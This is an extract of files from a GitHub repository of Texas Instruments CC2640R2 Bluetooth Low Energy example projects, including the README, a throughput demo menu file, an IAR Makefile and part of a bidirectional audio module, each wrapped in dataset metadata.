AncsApp_enqueueMsg(uint8_t event, uint8_t state,\n uint8_t *pData)\n{\n ancsAppEvt_t *pMsg = ICall_malloc(sizeof(ancsAppEvt_t));\n\n // Create dynamic pointer to message.\n if (pMsg)\n {\n pMsg->hdr.event = event;\n pMsg->hdr.state = state;\n pMsg->pData = pData;\n\n // Enqueue the message.\n return Util_enqueueMsg(appMsgQueue, syncEvent, (uint8_t *)pMsg);\n }\n\n return FALSE;\n}\n/*********************************************************************\n*********************************************************************/\n"
},
{
"alpha_fraction": 0.735872209072113,
"alphanum_fraction": 0.7762372493743896,
"avg_line_length": 47.084388732910156,
"blob_id": "3d62a93dc26122bab25b756f9e6aec0210a1a31a",
"content_id": "7223977dd36afa2ec34c4ab68379b84b5fd93c47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 11396,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 237,
"path": "/README.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "# Introduction TEST\n\nThese examples and demos are for **TI SimpleLink CC2640R2 SDK 1.40.00.45**\n\nThis repository contains **experimental** *Bluetooth®* 5 and\n*Bluetooth®* 4.2 Low Energy sample applications for Texas Instruments'\nSimpleLink CC2640R2 SDK. These examples have not been validated as\nproduction-ready.\n\n**Do not** use GitHub's bug tracking feature for support. For inquiries, see the\n[Bluetooth® low energy Forum](https://e2e.ti.com/support/wireless_connectivity/bluetooth_low_energy/f/538).\n\nTo use the examples and tools in this repository, please download and install\nthe [SimpleLink CC2640R2 SDK](http://www.ti.com/ble-stack) **first**, and if\nnecessary [buy an evaluation kit](http://www.ti.com/tool/launchxl-cc2640r2).\n\nFor other hardware and software resources,\n[please visit our wiki](http://www.ti.com/ble-wiki). If you have any questions\nplease refer to the [FAQ page](docs/faq.md).\n\nFor extra examples for **TI BLE-Stack 2.2.x SDK** (CC26x0R1), see\n[Branch: ble_examples-2.2](https://github.com/ti-simplelink/ble_examples/tree/ble_examples-2.2).\n\n# Navigating the Repository\n\nThe examples provided on this GitHub page serve as a plugin to a corresponding\nBLE-Stack SDK release. The master branch will always point to the latest release.\n\nOlder releases can be accessed by checking out/downloading their corresponding\nbranch. For more information on supported examples\nplease consult the readme.md of the desired branch/release.\n\n**Note: As of CC21640R2 SDK 1.35 and later the `ble5apps` component was added.**\n - ble5apps: Supports the Bluetooth 5 Core Specification and TI's BLE5-Stack.\n - bleapps: Supports the Bluetooth 4.2 Core Specification and TI's BLE-Stack component.\n\nFor for more information about different SDK components, please consult the\nstack's User Guide.\n\n## Change Log\n\nNote: The version numbers below are related to GitHub ble_examples releases.\nThe numbering scheme is in the form of M.mm.pp.bb. The fields pp.bb are incremented\nas GitHub examples are released, M.mm will map a GitHub release to a SimpleLink\nSDK release.\n\n### 1.40.02.02\n* Memory optimized Duplex Audio demo (Central + Peripheral)\n* SPP over BLE bug-fixes\n* Throughput demo fixes and porting to 1.40 SDK\n\n### 1.40.01.01\n\n* Added SPP over BLE (client/server) projects for BLE5- Stack and BLE-Stack\n* Minor ANCS updates\n\n### 1.40.00.00\nInitial offering of Simplelink CC2640R2 SDK 1.40.00.45 examples.\n* BLE5-Stack: Throughput Demo (Central/Peripheral)\n* BLE5-Stack: Long Range Demo (Central/Peripheral)\n* BLE5-Stack: Serial Port Profile (SPP) Server/Client\n* BLE-Stack: Serial Port Profile (SPP) Server/Client\n* BLE-Stack: Bidirectional Audio Demo (Central/Peripheral)\n* BLE-Stack: Apple Notification Center Service (ANCS) Demo (Peripheral)\n* Tools: voice.py script for Voice-over-HOGP\n\n\n## Installation\n\nThis repository can be cloned and tracked using Git. For instructions on how to\nclone a repository from Github please refer to this guide:\n[Clone from Github](https://help.github.com/articles/cloning-a-repository/)\n\nFor users who are unfamiliar with Git, there is the option of downloading the\ncontents of the repository as a zip file. See instructions below.\n\n1. Click the green \"Clone or download\" button\n1. Select \"Download ZIP\" option\n1. Zip folder will appear in your Downloads folder\n\nThis repository can be cloned/download anywhere on your computer. There is a\ndependency between this repository and the SimpleLink CC2640R2 SDK install\nlocation.\n\nBy default the SimpleLink CC2640R2 SDK will install to:\n\n C:\\ti\\simplelink_cc2640r2_sdk_1_40_00_45\n\nIf the Simplelink CC2640R2 SDK must be installed to a different location, then\nsee the [FAQ page](docs/faq.md) for IDE specific instructions for changing\nenvironment variables.\n\n## Required Tools\n\nSimilar to the Simplelink CC2640R2 SDK, the examples in this repository support\nthe CCS and IAR toolchains. Please pay careful attention to versions of these\ntools, the supported version are listed below. Using a non supported version is\nuntested and may result in unexpected behavior.\n\n* CCS v7.2.0 with TI ARM Compiler v16.09\n* IAR for ARM v8.11.2\n\nFor more information on toolchain setup, please refer to our\n[FAQ page](docs/faq.md).\n\n## FAQ\n\nThe [FAQ page](docs/faq.md) will try to address some of the common questions\nrelated to the ble_examples repo.\n\n## Examples / Demo List\n\n### Full Duplex Bidirectional Audio Demo\n\nEncode and transmit a full duplex bidirectional audio stream over BLE using two\nCC2640R2 LaunchPads with CC3200AUDBOOST.\n\n* simple\\_central\\_bidirectional\\_audio\n * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/bleapps/simple_central_bidirectional_audio/readme.md)\n * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/bleapps/simple_central_bidirectional_audio/tirtos/ccs)\n * [Source](examples/rtos/CC2640R2_LAUNCHXL/bleapps/simple_central_bidirectional_audio/src)\n\n* simple\\_peripheral\\_bidirectional\\_audio\n * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/bleapps/simple_peripheral_bidirectional_audio/readme.md)\n * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/bleapps/simple_peripheral_bidirectional_audio/tirtos/ccs)\n * [Source](examples/rtos/CC2640R2_LAUNCHXL/bleapps/simple_peripheral_bidirectional_audio/src)\n\n### Bluetooth 5 Throughput Demo\n\nThis is a 2 part demo where a throughput\\_central and throughput\\_peripheral\nconnect with one another, demonstrating the BLE5-Stack's 1 Mbps, 2 Mbps, 1+2\nMbps, and Coded PHYs.\n\n* throughput\\_central\n * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_central/readme.md)\n * [IAR Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_central/tirtos/iar)\n * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_central/tirtos/ccs)\n * [Source](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_central/src)\n* throughput\\_peripheral\n * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_peripheral/readme.md)\n * [IAR Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_peripheral/tirtos/iar)\n * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_peripheral/tirtos/ccs)\n * [Source](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_peripheral/src)\n\n### Bluetooth 5 Long Range Demo\n\nThis is a 2 part demo where a longrange\\_central and longrange\\_peripheral\nconnect with one another, demonstrating the BLE5-Stack's long range capabilities\nusing the Coded PHY (S8).\n\n* longrange\\_central\n * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_central/readme.md)\n * [IAR Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_central/tirtos/iar)\n * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_central/tirtos/ccs)\n * [Source](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_central/src)\n* longrange\\_peripheral\n * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_peripheral/readme.md)\n * [IAR Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_peripheral/tirtos/iar)\n * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_peripheral/tirtos/ccs)\n * [Source](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_peripheral/src)\n\n### Serial Port Profile (SPP) BLE Examples\n\nThis is a 2 part example where a spp\\_ble\\_client and spp\\_ble\\_server connect\nwith one another and exchange data over UART.\n\nThe demo supports Bluetooth 5 demonstrating the BLE5-Stack's new high speed 2Mbps PHYs:\n\n* spp\\_ble\\_client\n * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/spp_ble_client/readme.md)\n * [IAR Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/spp_ble_client/tirtos/iar)\n * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/spp_ble_client/tirtos/ccs)\n * [Source](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/spp_ble_client/src)\n* spp\\_ble\\_server\n * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/spp_ble_server/readme.md)\n * [IAR Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/spp_ble_server/tirtos/iar)\n * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/spp_ble_server/tirtos/ccs)\n * [Source](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/spp_ble_server/src)\n\nThe example also supports Bluetooth 4.2 demonstrating the BLE-Stack's Data Length\nExtension with OAD support:\n\n* spp\\_ble\\_client\n * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/bleapps/spp_ble_client/readme.md)\n * [IAR Project Files](examples/rtos/CC2640R2_LAUNCHXL/bleapps/spp_ble_client/tirtos/iar)\n * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/bleapps/spp_ble_client/tirtos/ccs)\n * [Source](examples/rtos/CC2640R2_LAUNCHXL/bleapps/spp_ble_client/src)\n* spp\\_ble\\_server\n * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/bleapps/spp_ble_server/readme.md)\n * [IAR Project Files](examples/rtos/CC2640R2_LAUNCHXL/bleapps/spp_ble_server/tirtos/iar)\n * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/bleapps/spp_ble_server/tirtos/ccs)\n * [Source](examples/rtos/CC2640R2_LAUNCHXL/bleapps/spp_ble_server/src)\n\n### Apple Notification Center Service (ANCS) Demo\n\nThis is an example that demonstrates the use and functionality of the ANCS. ANCS is a GATT\nservice present on iOS devices used to retrieve and interact with iOS notifications.\n\n* ancs\n * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/bleapps/ancs/readme.md)\n * [IAR Project Files](examples/rtos/CC2640R2_LAUNCHXL/bleapps/ancs/tirtos/iar)\n * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/bleapps/ancs/tirtos/ccs)\n * [Source](examples/rtos/CC2640R2_LAUNCHXL/bleapps/ancs/src)\n\n## Tools\n\n### [Voice.py](tools/scripts/voice/voice.py)\nThis is script allows developers to evaluate the Voice over\nHID-over-GATT-Profile (HoGP) profile which is demonstrated as part of the\n`voice_hogp_remote` example. The `voie_hogp_remote` is available as part of the\n[Simplelink CC2640R2 SDK BLE Example Pack](http://www.ti.com/tool/download/SIMPLELINK-CC2640R2-SDK-BLE-EXAMPLE-PACK).\nThe `voice.py` Python script is compatible with Python 2 or Python 3 and depends\non the Windows® only [pywinusb](https://pypi.python.org/pypi/pywinusb/) python\nmodule. The script has been tested to work on a Window 10 host with a BLE 4.0\ncompatible BLE controller. For help on how to use the `voice.py` script, simply\ninvoke its help menu `voice.py --help`.\n\n## References\n\nThe following reference pages may be helpful during general Bluetooth Low\nEnergy development. New users of the Simplelink CC2640R2 platform and Bluetooth\n5 development are encouraged to read the\n[BLE5-Stack User's Guide][BLE5-Stack].\nUsers developing Bluetooth 4.2 applications are encouraged to read the\n[BLE Software Developer's Guide][BLE-Stack].\n\nAs an additional resource, users are encouraged to complete the\n[SimpleLink Academy](http://software-dl.ti.com/lprf/simplelink_academy/overview.html)\ntraining.\n\nOther resources can be found below:\n\n* [BLE wiki](http://www.ti.com/ble-wiki)\n* [BLE E2E Page](www.ti.com/ble-forum)\n\n[BLE5-Stack]: (http://software-dl.ti.com/simplelink/esd/simplelink_cc2640r2_sdk/1.40.00.45/exports/docs/ble5stack/ble_user_guide/html/ble-stack-5.x-guide/index.html)\n[BLE-Stack]: (http://software-dl.ti.com/simplelink/esd/simplelink_cc2640r2_sdk/1.40.00.45/exports/docs/blestack/ble_user_guide/html/ble-stack-3.x-guide/index.html)\n"
},
{
"alpha_fraction": 0.690304696559906,
"alphanum_fraction": 0.7030470967292786,
"avg_line_length": 37.38298034667969,
"blob_id": "ffb0de3b26105f65a5f0edd75f4ab05ee623b071",
"content_id": "802efa5fa2e4c59c947fa298a49c6317dde26dff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1805,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 47,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_central/src/app/throughput_central_menu.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "#include <bcomdef.h>\n#include <ti/display/Display.h>\n\n#if defined(BLE_V50_FEATURES) && (BLE_V50_FEATURES & PHY_2MBPS_CFG) && !defined(Display_DISABLE_ALL)\n#include <menu/two_btn_menu.h>\n#include \"throughput_central_menu.h\"\n#include \"throughput_central.h\"\n\n/*\n * Menu Lists Initializations\n */\n\n/* Menu: Main\n 3 submenus, no actions, no upper */\nMENU_OBJ(sbcMenuMain, NULL, 5, NULL)\n MENU_ITEM_SUBMENU(&sbcMenuScanandConnect)\n MENU_ITEM_SUBMENU(&sbcMenuSetPhy)\n MENU_ITEM_SUBMENU(&sbcMenuSetDLEPDU)\n MENU_ITEM_ACTION(\"Toggle RSSI Readings\", SimpleBLECentral_doToggleRSSI)\n MENU_ITEM_ACTION(\"Disconnect\", SimpleBLECentral_doDisconnect)\nMENU_OBJ_END\n\n/* Menu: Scanning and Connection\n 3 actions, upper = sbpMenuMain */\nMENU_OBJ(sbcMenuScanandConnect, \"Scan/Connect Menu\", 3, &sbcMenuMain)\n MENU_ITEM_ACTION(\"Select Next Device\", SimpleBLECentral_doScanAndConnect)\n MENU_ITEM_ACTION(\"Connect to Selected Device\", SimpleBLECentral_doScanAndConnect)\n MENU_ITEM_ACTION(\"Scan for Devices\", SimpleBLECentral_doScanAndConnect)\nMENU_OBJ_END\n\n/* Menu: Set PHY\n 5 actions, upper = sbpMenuMain */\nMENU_OBJ(sbcMenuSetPhy, \"Set PHY\", 4, &sbcMenuMain)\n MENU_ITEM_ACTION(\"1 Mbps\", SimpleBLECentral_doSetPhy)\n MENU_ITEM_ACTION(\"2 Mbps\", SimpleBLECentral_doSetPhy)\n MENU_ITEM_ACTION(\"Coded:S2\", SimpleBLECentral_doSetPhy)\n MENU_ITEM_ACTION(\"Coded:S8\", SimpleBLECentral_doSetPhy)\nMENU_OBJ_END\n\n/* Menu: Set DLE PDU\n 2 actions, upper = sbpMenuMain */\nMENU_OBJ(sbcMenuSetDLEPDU, \"Set PDU\", 2, &sbcMenuMain)\n MENU_ITEM_ACTION(\"27 Bytes\", SimpleBLECentral_doSetDLEPDU)\n MENU_ITEM_ACTION(\"251 Bytes\", SimpleBLECentral_doSetDLEPDU)\nMENU_OBJ_END\n\n#endif // PHY_2MBPS_CFG && !Display_DISABLE_ALL\n\n"
},
{
"alpha_fraction": 0.6597671508789062,
"alphanum_fraction": 0.6979301571846008,
"avg_line_length": 22.074626922607422,
"blob_id": "d738dbd117492dc47c4c7062fa075b9dcf763856",
"content_id": "2a49f1a52e7e5ff4e6a7a65eb97835cacc54eee0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 1546,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 67,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/bleapps/ancs/tirtos/iar/Makefile",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "PROJECT=$(BLE_REPO)/examples/rtos/CC2640R2_LAUNCHXL/blestack/ancs/tirtos/iar\nBLE_REPO=../../../../../../..\nIAR_PATH=C:/Program\\ Files\\ \\(x86\\)/IAR\\ Systems/EWARM-$(IAR_VERSION)/common/bin\nIAR_VERSION=8.11.1\n\nall: ancs_src\n\nrelease: clean ancs\n\nancs:\n\t$(IAR_PATH)/iarbuild.exe $(PROJECT)/stack/cc2640r2lp_stack.ewp \\\n\t-build \\\n\tFlashROM_Library \\\n\t-log info \\\n\t-parallel 1 \\\n\t-varfile ancs.custom_argvars\n\n\t$(IAR_PATH)/iarbuild.exe $(PROJECT)/app/cc2640r2lp_app.ewp \\\n\t-build \\\n\tFlashROM_StackLibrary \\\n\t-log info \\\n\t-parallel 1 \\\n\t-varfile ancs.custom_argvars\n\nancs_src:\n\t$(IAR_PATH)/iarbuild.exe $(PROJECT)/stack/cc2640r2lp_stack_src.ewp \\\n\t-build \\\n\tFlashOnly_Library \\\n\t-log info \\\n\t-parallel 1 \\\n\t-varfile ancs_src.custom_argvars\n\n\t$(IAR_PATH)/iarbuild.exe $(PROJECT)/app/cc2640r2lp_app_src.ewp \\\n\t-build \\\n\tFlashOnly_StackLibrary \\\n\t-log info \\\n\t-parallel 1 \\\n\t-varfile ancs_src.custom_argvars\n\nclean:\n\t$(IAR_PATH)/iarbuild.exe $(PROJECT)/stack/cc2640r2lp_stack.ewp \\\n\t-clean \\\n\tFlashROM_Library \\\n\t-log info \\\n\t-parallel 1 \\\n\t-varfile ancs.custom_argvars\n\n\t$(IAR_PATH)/iarbuild.exe $(PROJECT)/app/cc2640r2lp_app.ewp \\\n\t-clean \\\n\tFlashROM_StackLibrary \\\n\t-log info \\\n\t-parallel 1 \\\n\t-varfile ancs.custom_argvars\n\n\t$(IAR_PATH)/iarbuild.exe $(PROJECT)/stack/cc2640r2lp_stack_src.ewp \\\n\t-clean \\\n\tFlashOnly_Library \\\n\t-log info \\\n\t-parallel 1 \\\n\t-varfile ancs_src.custom_argvars\n\n\t$(IAR_PATH)/iarbuild.exe $(PROJECT)/app/cc2640r2lp_app_src.ewp \\\n\t-clean \\\n\tFlashOnly_StackLibrary \\\n\t-log info \\\n\t-parallel 1 \\\n\t-varfile ancs_src.custom_argvars\n"
},
{
"alpha_fraction": 0.5383416414260864,
"alphanum_fraction": 0.5527970194816589,
"avg_line_length": 32.34946060180664,
"blob_id": "f5ec937c33b0cef812e16efe6e695f7c47a5edae",
"content_id": "23b871ffb5dbb86d3ddff3b37c9e6d402d97de8c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 37218,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 1116,
"path": "/source/ti/blestack/profiles/audio_dle/audio_duplex.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/*\n * Filename: audio_duplex.c\n *\n * Description: Implements bidirectional VoGP audio/voice communication\n * This module connects data from the user application task(buttons),\n * data from the I2S driver (local audio frames), and data from the\n * BLE-Stack Audio Profile (incoming audio frames).\n *\n * Calls to this module run in the application task context. A callback\n * must be plugged for the module to handle higher priority CBs such as\n * Audio data and I2S callbacks\n *\n * Copyright (C) 2016 Texas Instruments Incorporated - http://www.ti.com/\n *\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the\n * distribution.\n *\n * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n */\n\n/*********************************************************************\n * INCLUDES\n */\n#include <string.h>\n#include <ti/sysbios/BIOS.h>\n#include <ti/sysbios/knl/Task.h>\n#include <ti/sysbios/family/arm/m3/Hwi.h>\n#include <driverlib/vims.h>\n#include <driverlib/flash.h>\n#include <ti/display/Display.h>\n#include <profiles/audio_dle/audio_profile_dle.h>\n#include <ti/audiocodec/audiocodec.h>\n#include <third_party/sbc/include/msbc_library.h>\n#include <ti/drivers/i2s/I2SCC26XX.h>\n#include <ti/drivers/pdm/Codec1.h>\n\n#include \"audio_duplex.h\"\n#include \"icall_ble_api.h\"\n#include \"hal_flash.h\"\n\n/*********************************************************************\n * CONSTANTS\n */\n\n#define BLEAUDIO_NUM_NOT_PER_FRAME_ADPCM 1\n#define BLEAUDIO_NUM_NOT_PER_FRAME_MSBC 1\n\n/*\n * Required Memory for Bi-directional audio streaming:\n * The I2S driver requires two blocks of memory to be\n * passed in at its open call.\n * 1. Queue memory for TI-RTOS Queue elements\n * 2. Sample memory for sample buffers\n *\n * The amount of memory required while streaming is:\n * (uncompressed buffer)*2 (bidirectional)*sizeof(unit16_t)*I2SCC26XX_QUEUE_SIZE\n *\n * An MSBC frame is larger than ADPCM so in this case we use the worst case\n */\n#define I2S_BUF sizeof(int16_t) * (AUDIO_DUPLEX_MSBC_SAMPLES_PER_FRAME * \\\n I2SCC26XX_QUEUE_SIZE * 2)\n\n#define I2S_MEM_BASE (GPRAM_BASE + FlashSectorSizeGet())\n\n/*********************************************************************\n * TYPEDEFS\n */\n\n/*********************************************************************\n * GLOBAL VARIABLES\n */\n\n/*********************************************************************\n * LOCAL FUNCTIONS\n */\nstatic void AudioDuplex_i2sCallbackFxn(I2SCC26XX_Handle handle,\n I2SCC26XX_StreamNotification *notification);\nstatic void AudioDuplex_enableCache();\nstatic void AudioDuplex_disableCache();\nstatic bStatus_t AudioDuplex_transmitAudioFrame(uint8_t *buf);\nstatic I2SCC26XX_Handle AudioDuplex_openI2S(void);\nstatic void AudioDuplex_startI2Sstream(void);\nstatic void AudioDuplex_stopI2Sstream(void);\nstatic void AudioDuplex_sendStartCmd(void);\nstatic void AudioDuplex_sendStopCmd(void);\nstatic void AudioDuplex_shiftEncodedBuffer(uint8_t *encodedBuf, uint8_t len,\n uint8_t streamType);\n\n/*********************************************************************\n * LOCAL VARIABLES\n */\n\n// Audio Buffer variables\nstatic int16_t *audio_decoded = NULL;\nstatic uint8_t *i2sContMgtBuffer = NULL;\nstatic sbc_t sbc = {0};\nstatic size_t written = 0;\n\n// I2S Variables\nstatic I2SCC26XX_Handle i2sHandle = NULL;\nstatic I2SCC26XX_StreamNotification i2sStream;\nstatic bool i2sStreamInProgress = false;\nstatic uint8_t volume = AUDIO_DUPLEX_MAX_VOLUME;\nstatic uint8_t seqNum = 0;\n\n// BLE Connection handle of stream\nuint16_t audioConnectionHandle = NULL;\n// Display Interface\nstatic Display_Handle hDisp = NULL;\n// A function pointer to call in the application to set an event\nstatic pfnAudioDuplexCB_t appAudioCB = NULL;\n\nstatic AudioDuplex_streamVars streamVariables =\n{\n AudioDuplex_stream_idle,\n AudioDuplex_stream_idle,\n AUDIO_DUPLEX_STREAM_TYPE_NONE,\n AUDIO_DUPLEX_STREAM_TYPE_NONE,\n 0,\n 0,\n I2SCC26XX_QUEUE_SIZE,\n BLEAUDIO_MAX_NOTSIZE,\n 0, // si\n 0, // pv\n 0, // si_rx\n 0, // pv_rx\n AUDIO_DUPLEX_MAX_VOLUME, // maxVolume\n};\n\nstatic I2SCC26XX_Params i2sParams =\n{\n .requestMode = I2SCC26XX_CALLBACK_MODE,\n .ui32requestTimeout = BIOS_WAIT_FOREVER,\n .callbackFxn = AudioDuplex_i2sCallbackFxn,\n .blockSize = AUDIO_DUPLEX_MSBC_SAMPLES_PER_FRAME,\n .pvContBuffer = NULL,\n .ui32conBufTotalSize = 0,\n .pvContMgtBuffer = NULL,\n .ui32conMgtBufTotalSize = 0,\n .currentStream = &i2sStream\n};\n\n\n/*********************************************************************\n * PUBLIC FUNCTIONS\n */\n\n/*********************************************************************\n * @fn AudioDuplex_open\n *\n * @brief Called during initialization, opens codec and I2S driver\n * Initializes hardware and adds Audio Profile\n *\n * @param None.\n *\n * @return None.\n */\nint8_t AudioDuplex_open(Display_Handle displayHandle, PIN_Handle pinHandle,\n pfnAudioDuplexCB_t inputCB)\n{\n uint8_t status = AUDIO_DUPLEX_SUCCESS;\n hDisp = displayHandle;\n\n // Store app callback if not null\n if(inputCB == NULL)\n {\n Display_print0(hDisp, 4, 0, \"Fail: AudioCB is NULL\");\n return (AUDIO_INVALID_PARAMS);\n }\n\n appAudioCB = inputCB;\n\n /* Initialize I2S driver */\n i2sHandle = (I2SCC26XX_Handle)&(I2SCC26XX_config);\n I2SCC26XX_init(i2sHandle);\n\n // Initialize TLV320AIC3254 Codec on Audio BP\n status = AudioCodecOpen();\n if( AUDIO_CODEC_STATUS_SUCCESS != status)\n {\n Display_print0(hDisp, 4, 0, \"Fail: Can't open codec\");\n }\n // Configure Codec\n status = AudioCodecConfig(AUDIO_CODEC_TI_3254, AUDIO_CODEC_16_BIT,\n AUDIO_DUPLEX_SAMPLE_RATE, AUDIO_DUPLEX_NUM_CHAN,\n AUDIO_DUPLEX_OUTPUT_OPTION,\n AUDIO_DUPLEX_INPUT_OPTION);\n if( AUDIO_CODEC_STATUS_SUCCESS != status)\n {\n Display_print0(hDisp, 4, 0, \"Fail: Can't configure BP\");\n }\n\n // Add the Audio service\n status = Audio_AddService();\n\n if(SUCCESS != status)\n {\n Display_print0(hDisp, 4, 0, \"Fail: Can't add Audio Service\");\n }\n\n return (status);\n}\n\n/*********************************************************************\n * @fn AudioDuplex_close\n *\n * @brief Closes hardware, stops streaming\n *\n * @param None.\n *\n * @return None.\n */\nvoid AudioDuplex_close(void)\n{\n // Close the interface to the hardware codec\n AudioCodecClose();\n\n // Reset stream vars\n streamVariables.streamState = AudioDuplex_stream_idle;\n streamVariables.requestedStreamState = AudioDuplex_stream_idle;\n streamVariables.streamType = AUDIO_DUPLEX_STREAM_TYPE_NONE;\n streamVariables.requestedStreamType = AUDIO_DUPLEX_STREAM_TYPE_NONE;\n streamVariables.samplesPerFrame = 0;\n streamVariables.notificationsPerFrame = 0;\n streamVariables.numOfFramesToBuffer = I2SCC26XX_QUEUE_SIZE;\n streamVariables.rfFrameSize = BLEAUDIO_MAX_NOTSIZE;\n streamVariables.si = 0; // si;\n streamVariables.pv = 0; // pv;\n streamVariables.si_rx = 0; // si_rx;\n streamVariables.pv_rx = 0; // pv_rx;\n streamVariables.maxVolume = AUDIO_DUPLEX_MAX_VOLUME; // maxVolume;\n}\n\n/*********************************************************************\n * @fn AudioDuplex_setConnectionHandle\n *\n * @brief Set the connection handle of audio streaming\n *\n * @param connectionHandle - Connection handle.\n *\n * @return None\n */\nvoid AudioDuplex_setConnectionHandle(uint16_t connectionHandle)\n{\n audioConnectionHandle = connectionHandle;\n}\n\n/*********************************************************************\n * @fn AudioDuplex_getConnectionHandle\n *\n * @brief Get the connection handle of audio streaming\n *\n * @return connectionHandle- the handle used to stream\n */\nuint16_t AudioDuplex_getConnectionHandle(void)\n{\n return (audioConnectionHandle);\n}\n\n/*********************************************************************\n * @fn AudioDuplex_eventHandler\n *\n * @brief Processes Events called from I2S or BLE-Stack callbacks\n *\n * @param events - Events to process.\n *\n * @return None\n */\nvoid AudioDuplex_eventHandler(uint8_t events)\n{\n // Read in samples from I2S driver and encode\n if (events & AUDIO_DUPLEX_I2S_FRAME_EVENT)\n {\n if (i2sStreamInProgress)\n {\n I2SCC26XX_BufferRequest bufferRequest;\n I2SCC26XX_BufferRelease bufferRelease;\n bufferRequest.buffersRequested = I2SCC26XX_BUFFER_IN;\n // Indicate that we request buffer from input stream\n bool gotBuffer = I2SCC26XX_requestBuffer(i2sHandle, &bufferRequest);\n while (gotBuffer)\n {\n uint8_t *inBuffer = (uint8_t *)bufferRequest.bufferIn;\n uint8_t *bufHead = inBuffer;\n uint8_t si_local = streamVariables.si;\n uint16_t pv_local = streamVariables.pv;\n\n if (streamVariables.streamType == AUDIO_DUPLEX_STREAM_TYPE_MSBC)\n {\n sbc_encode(&sbc, (int16_t *)bufferRequest.bufferIn,\n streamVariables.samplesPerFrame * sizeof(int16_t),\n inBuffer,\n AUDIO_DUPLEX_MSBC_ENCODED_SIZE, &written);\n\n // Shift the buffer to acount for the seqNum hdr\n AudioDuplex_shiftEncodedBuffer(inBuffer,\n BLEAUDIO_MAX_NOTSIZE,\n AUDIO_DUPLEX_STREAM_TYPE_MSBC);\n inBuffer[1] = seqNum++;\n }\n else\n {\n Codec1_encodeBuff(inBuffer,\n (int16_t *)bufferRequest.bufferIn,\n streamVariables.samplesPerFrame,\n &streamVariables.si, &streamVariables.pv);\n\n // Reset the pointer\n inBuffer = bufHead;\n bufferRequest.bufferIn = bufHead;\n\n // 